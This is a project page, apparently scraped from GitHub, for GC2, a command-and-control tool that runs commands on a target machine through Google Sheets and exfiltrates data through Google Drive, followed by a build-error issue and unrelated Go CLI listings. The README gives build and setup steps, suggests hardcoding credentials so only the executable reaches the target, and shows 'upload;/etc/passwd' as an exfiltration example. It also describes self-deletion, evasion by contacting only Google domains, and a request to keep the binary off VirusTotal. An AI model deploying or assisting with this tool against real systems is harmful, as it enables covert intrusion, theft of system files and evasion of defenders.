GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.

Overview

GC2

Logo

GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.

Why

This program has been developed in order to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, ...) during Red Teaming activities.

Furthermore, the program will interact only with Google's domains (*.google.com) to make detection more difficult.

PS: Please don't upload the compiled binary on VirusTotal :)

Set up

  1. Build executable

    git clone https://github.com/looCiprian/GC2-sheet
    cd GC2-sheet
    go build gc2-sheet.go
  2. Create a new google "service account"

    Create a new google "service account" using https://console.cloud.google.com/, create a .json key file for the service account

  3. Enable Google Sheet API and Google Drive API

    Enable Google Drive API https://developers.google.com/drive/api/v3/enable-drive-api and Google Sheet API https://developers.google.com/sheets/api/quickstart/go

  4. Set up Google Sheet and Google Drive

    Create a new Google Sheet and add the service account to the editor group of the spreadsheet (to add the service account use its email)

    Sheet Permission

    Create a new Google Drive folder and add the service account to the editor group of the folder (to add the service account use its email)

    Sheet Permission

  5. Start the C2

    gc2-sheet --key 
         
           --sheet 
          
            --drive 
           
    
           
          
         

    PS: you can also hardcode the parameters in the code, so you will upload only the executable on the target machine (look at comments in root.go and authentication.go)

Features

  • Command execution using Google Sheet as a console
  • Download files on the target using Google Drive
  • Data exfiltration using Google Drive
  • Exit

Command execution

The program will perform a request to the spreedsheet every 5 sec to check if there are some new commands. Commands must be inserted in the column "A", and the output will be printed in the column "B".

Data exfiltration file

Special commands are reserved to perform the upload and download to the target machine

From Target to Google Drive
upload;
   
    
Example:
upload;/etc/passwd

   

Download file

Special commands are reserved to perform the upload and download to the target machine

From Google Drive to Target
download;
   
    ;
    
     
Example:
download;
     
      ;/home/user/downloaded.txt

     
    
   

Exit

By sending the command exit, the program will delete itself from the target and kill its process

PS: From os documentation: If a symlink was used to start the process, depending on the operating system, the result might be the symlink or the path it pointed to. In this case the symlink is deleted.

WorkFlow

Work Flow

Demo

Demo

Disclaimer

The owner of this project is not responsible for any illegal usage of this program.

Support the project

Pull request or paypal

Issues
  • too many error

    too many error

    Hi ,

    Got this error when I try to build with golang on debian 10 : /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:22:24: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:383:26: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:425:24: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:437:27: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:475:25: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:486:20: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:501:38: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:529:21: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:566:28: undefined: io.StringWriter /root/go/pkg/mod/github.com/spf13/[email protected]/bash_completions.go:591:29: undefined: io.StringWriter

    Any suggestion ? Thanks

    opened by WTF3 2
Owner
Lorenzo Grazian
Penetration tester and enthusiast developer. OSCP|OSWE|GPEN|eMAPT|AWS|GCPN
Lorenzo Grazian
painless task queue manager for shell commands with an intuitive cli interface (execute shell commands in distributed cloud-native queue manager).

EXEQ DOCS STILL IN PROGRESS. Execute shell commands in queues via cli or http interface. Features Simple intuitive tiny cli app. Modular queue backend

Mohammed Al Ashaal 12 Jan 29, 2022
Slack remote terminal - execute commands on remote host using slack slash command

slackRT Slack remote terminal - execute commands on remote host using slack slash command Installation Go to api.slack.com/apps and sign in and create

null 1 Jan 16, 2022
A small CLI tool to check connection from a local machine to a remote target in various protocols.

CHK chk is a small CLI tool to check connection from a local machine to a remote target in various protocols.

null 25 Mar 30, 2022
Go Library to Execute Commands Over SSH at Scale

Go library to handle tens of thousands SSH connections and execute the command(s) with higher-level API for building network device / server automation.

Yahoo 811 Jun 22, 2022
A CLI to execute AT Commands via serial port connections.

AT Command CLI A CLI to execute AT Commands via serial port connections. Development Install Go Run go run main.go

Daniel Khaapamyaki 22 Jun 19, 2022
Rafael Mateus 2 Jan 31, 2022
Fetches the output for an AWS SSM command for every target

AWSCommander Fetches the output for an AWS SSM command for every target. Optionally outputs as HTML. Examples Get command from Tokio Japan as text AWS

Michael Bradley 0 Nov 24, 2021
A Target Tracking , NoteTaking , CheckLists and Data Management GUI App for Bug Hunter's and Pentesters.

Screenshots Features • Installation • Usage • Features • Notes • Sandman A Target Tracking , NoteTaking , CheckLists and Data Management GUI App for B

Tarun Koyalwar 18 Jun 14, 2022
Command line tool to copy images from a camera SD card to your hard drive

Command line tool to copy images from a camera SD card to your hard drive

Clay Dowling 0 Nov 26, 2021
This is a command line application to manage and fine-tune Time Machine exclude paths.

heptapod This is a command line application to manage and fine-tune Time Machine exclude paths. This repository is a WIP! The advertised functionality

Gergő Törcsvári 11 Jun 30, 2022
Brigodier is a command parser & dispatcher, designed and developed for command lines such as for Discord bots or Minecraft chat commands. It is a complete port from Mojang's "brigadier" into Go.

brigodier Brigodier is a command parser & dispatcher, designed and developed to provide a simple and flexible command framework. It can be used in man

Minekube 16 Jun 5, 2022
A command line tool that builds and (re)starts your web application everytime you save a Go or template fileA command line tool that builds and (re)starts your web application everytime you save a Go or template file

# Fresh Fresh is a command line tool that builds and (re)starts your web application everytime you save a Go or template file. If the web framework yo

null 0 Nov 22, 2021
The Keel CLI allows you to setup Keel on your local dev machine or on a Kubernetes cluster

keel-cli What is keel-cli The Keel CLI allows you to setup Keel on your local dev machine or on a Kubernetes cluster, launches and manages Keel instan

null 0 Oct 7, 2021
The Dapr CLI allows you to setup Dapr on your local dev machine or on a Kubernetes cluster

Dapr CLI The Dapr CLI allows you to setup Dapr on your local dev machine or on a

null 1 Dec 23, 2021
Allows you to use the magic remote on your webOS LG TV as a keyboard/mouse for your Linux machine

magic4linux Allows you to use the magic remote on your webOS LG TV as a keyboard/mouse for your PC Linux machine. This is a Linux implementation of th

Mathias Fredriksson 0 Feb 7, 2022
A CLI application that allows you to run a complete ToDo app from your terminal application

todo-cli This is a CLI application that allows you to run a complete ToDo app from your terminal application. As a user you can: Create a list of todo

Jonathan Reeves 0 Oct 11, 2021
Envp - ENVP is cli wrapper that sets environment variables by profile when you execute the command line

ENVP ENVP is cli wrapper that sets environment variables by profile based config

Sunggun Yu 2 Feb 25, 2022
Hasura-fzf - This command has a fzf-like UI that allows you to find and run the file version used by the hasura command

hasura-fzf This command has a fzf-like UI that allows you to find and run the fi

Shoki Hata 4 Jun 6, 2022
Integrated console application library, using Go structs as commands, with menus, completions, hints, history, Vim mode, $EDITOR usage, and more ...

Gonsole - Integrated Console Application library This package rests on a readline console library, (giving advanced completion, hint, input and histor

null 17 Apr 3, 2022